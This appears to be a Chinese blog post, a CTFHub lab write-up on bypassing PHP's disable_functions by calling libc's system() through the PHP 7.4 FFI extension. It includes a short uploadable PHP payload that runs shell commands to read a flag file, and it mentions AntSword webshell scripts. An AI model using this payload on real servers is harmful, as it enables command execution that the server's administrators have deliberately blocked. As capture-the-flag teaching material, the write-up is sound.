CTHHUB技能树 FFI

hcjtn

于 2022-04-08 19:24:11 发布

阅读量1.2k

点赞数

分类专栏： php Bypass disable_function 文章标签： php 网络安全

本文链接：https://blog.csdn.net/m0_62879498/article/details/124049016

版权

php Bypass disable_function 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

CTHHUB技能树 FFI

在以前如果我们想要在 php中应用c语言的库，我们需要用c语言写 wrapper，把他们包装成扩展，在php7.4版本中，引入了一个扩展：PHP FFI 提供了高级语言的相互调用，或者说就是让我们在 php 里面。调用 c代码的技术。

这里面就存在安全漏洞，我们可以利用 FFI扩展来执行 c的函数，来达到绕过disable_function的目的

FFI的使用只需要声明和调用两步

声明FFI，使用c语言的system函数

$ffi = FFI::cdef("int system(const char *command);");

调用创建的函数

$ffi->system("tac /flag > /tmp/hcj.txt");

做题步骤
在这里插入图片描述

上传php文件
在这里插入图片描述

<?php
$ffi = FFI::cdef("int system(const char *command);");//声明FFI
$ffi->system("tac /flag > /tmp/hcj");//执行命令，读取flag
echo file_get_contents("/tmp/hcj");//输出flag
@unlink("/tmp/123");//删除 文件

访问 .php即可获得 flag

在这里插入图片描述

也可以直接使用蚁剑的脚本直接访问 flag
在这里插入图片描述

hcjtn

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CTHHUB技能树 FFI

CTHHUB技能树 FFI在以前如果我们想要在 php中应用c语言的库，我们需要用c语言写 wrapper，把他们包装成扩展，在php7.4版本中，引入了一个扩展：PHP FFI 提供了高级语言的相互调用，或者说就是让我们在 php 里面。调用 c代码的技术。这里面就存在安全漏洞，我们可以利用 FFI扩展来执行 c的函数，来达到绕过disable_function的目的FFI的使用只需要声明和调用两步声明FFI，使用c语言的system函数$ffi = FFI::cdef("int syste
复制链接

扫一扫

专栏目录